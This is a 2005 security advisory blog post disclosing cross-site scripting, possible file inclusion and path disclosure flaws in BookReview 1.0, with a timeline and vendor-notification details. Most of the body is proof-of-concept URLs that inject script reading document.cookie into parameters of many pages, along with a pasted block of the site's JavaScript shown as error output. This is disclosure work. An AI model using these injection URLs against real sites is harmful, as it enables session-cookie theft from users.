BookReview 1.0 multiple variable XSS

Wednesday, May 25, 2005
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
OSVDB ID:16871,16872,16873,16874,16875,16876,16877
16878,16879,16880,16881
BID:13783
Securitytracker: 1014058
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.

############
versions:
############

BookReview beta 1.0 vulnerable.

##############
solution
##############

no solutions was available at this time

###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005

##################
proof of concepts
###################

all files are submited to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents
&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

whith this if you think we have two wais for exploiting this situation,
one whith the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node=
"><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X
&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var section = 0; var chapter = 0; var appendix = 0; var main_prefix = ""; var section_prefix = ""; for ( i=0; i var persian = '' + value; var roman=""; var ronumdashes=""; var buffer=10-persian.length; while (buffer>0) {persian="0"+persian;buffer--} var units=new Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM"); var thousands=new Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var billionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes=billionsdashes[persian.substring(0,1)]; var hundredmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var tenmillionsdashes=new Array("","=","==","===","==","=","==","===","====","=="); romandashes+=tenmillionsdashes[persian.substring(2,3)]; var millionsdashes=new Array("","_","__","___","_=","=","=_","=__","=___","_="); romandashes+=millionsdashes[persian.substring(3,4)]; var hundredthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var tenthousandsdashes=new Array("","_","__","___","__","_","__","___","____","__"); romandashes+=tenthousandsdashes[persian.substring(5,6)]; var thousandsdashes=new Array("","","",""," _","_","_","_","_"," _"); romandashes+=thousandsdashes[persian.substring(6,7)]; roman=thousands[persian.substring(0,1)]; roman+=hundreds[persian.substring(1,2)]; roman+=tens[persian.substring(2,3)]; roman+=thousands[persian.substring(3,4)]; roman+=hundreds[persian.substring(4,5)]; roman+=tens[persian.substring(5,6)]; roman+=thousands[persian.substring(6,7)]; roman+=hundreds[persian.substring(7,8)]; roman+=tens[persian.substring(8,9)]; roman+=units[persian.substring(9,10)]; return roman; } function alphabetise(number) { return String.fromCharCode(64+number); } /// function submitconfirm() { var agree = document.getElementById('agree'); if ( !agree.checked ) { alert("You must indicate your agreement to the terms and conditions by checking the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aqua
culture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring
%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29
%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics
"><script>alert(document.cookie)</script>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><
script>alert(document.cookie)</script> .htm

http://[victim]/directory/">%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%
5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5
Bstring%5D=&submit%5Btype%5D=title

######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...